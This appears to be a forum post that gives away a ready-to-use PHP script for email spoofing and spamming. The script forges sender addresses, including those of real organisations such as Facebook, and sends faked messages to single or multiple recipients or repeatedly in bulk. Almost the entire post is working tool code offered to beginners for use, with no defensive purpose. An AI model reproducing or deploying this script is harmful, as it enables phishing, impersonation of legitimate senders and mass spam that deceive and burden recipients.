Email Spoofing With PHP Code

what is email spoofing?". Well, it's pretty simple. It's faking an email, real or fake.


It can be legit like email@facebook.com or fake like fakeemails@fakemailsunited.org


Anything is possible.


To the tutorial babies.
All you need is one basic file in PHP, which in fact, you can copy and paste.
(Note this tutorial includes, an email spammer, and faker)


Heres index.php:

Code: [Select]

 <h1>Email Spoof</h1> <p><b>USE AT OWN RISK</b></p> <? // error_reporting (0); if(!set_time_limit(0)) { $limit = false; } else { set_time_limit(0); ignore_user_abort(1); $limit = true; } $log = 'log.txt'; // Log file ini_set('max_execution_time', '0'); ?> <? $ip = getenv('REMOTE_ADDR'); if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3') { $_POST['to'] = stripslashes($_POST['to']); $_POST['msg'] = stripslashes($_POST['msg']); $_POST['from'] = stripslashes($_POST['from']); $_POST['subject'] = stripslashes($_POST['subject']); if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe']) { $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n"; $headers .= "From: ".$_POST['from']; $fz=$headers; if($_GET['mail'] == '1') { mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); } elseif($_GET['mail'] == '2') { $_POST['to'] = explode("\n",$_POST['to']); foreach($_POST['to'] as $poluchatels) { mail($poluchatels, $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); } } elseif($_GET['mail'] == '3') { if(preg_match('/[0-9]+/',$_POST['kol'])) { $f = fopen($log,'a'); fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n"); fclose($f); for($i=0;$i<$_POST['kol'];$i++) { $r=rand(1,10000); $headers=$fz.$r."\n"; mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); sleep(1); $headers=$fz; } } else { echo('Incorrect (or not entered) number of messages'); } } $f = fopen($log,'a'); fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n"); fclose($f); echo('<center><b><font color="green">Message succesfully sent</font></b></center>'); } else { ?> <form style="width:350px" method='post'> <? if($_GET['mail'] == '1' || $_GET['mail'] == '3') { echo("Receiver &nbsp;<input type='text'name='to'><br>"); } ?> Sender <input type='text' name='from'><br> Subject &nbsp;<input type='text' name='subject'><br> <? if($_GET['mail'] == '3') { echo("Amount of messages <input type='text' name='kol'><br>"); } ?> <br> htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br> <? if($_GET['mail'] == '2') { echo("Receivers<br><textarea name='to' rows='10' cols='30'>abc@gmail.com xyz@yahoo.com zzz@zzzz.com</textarea>"); } ?> <br>Message<br> <textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'> </form> <? } } else { ?><br> <a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Send simple fake message</a><br> <a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Spam 1</a><br><a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Spam 2</a><br> <?
}


- Code Finish Here :)

If this doesn't work, its because of spacing and you should see http://prestoapps.org/mailspoof/script.js

It runs on toggle() in JS.[/font][/size]
Not much of a tutorial, more of a giveaway.[/font][/size]
Please note that email spoofing needs a website to be run on, and emails can be limited on servers, and it may not be included at all. SO check with your hosting provider.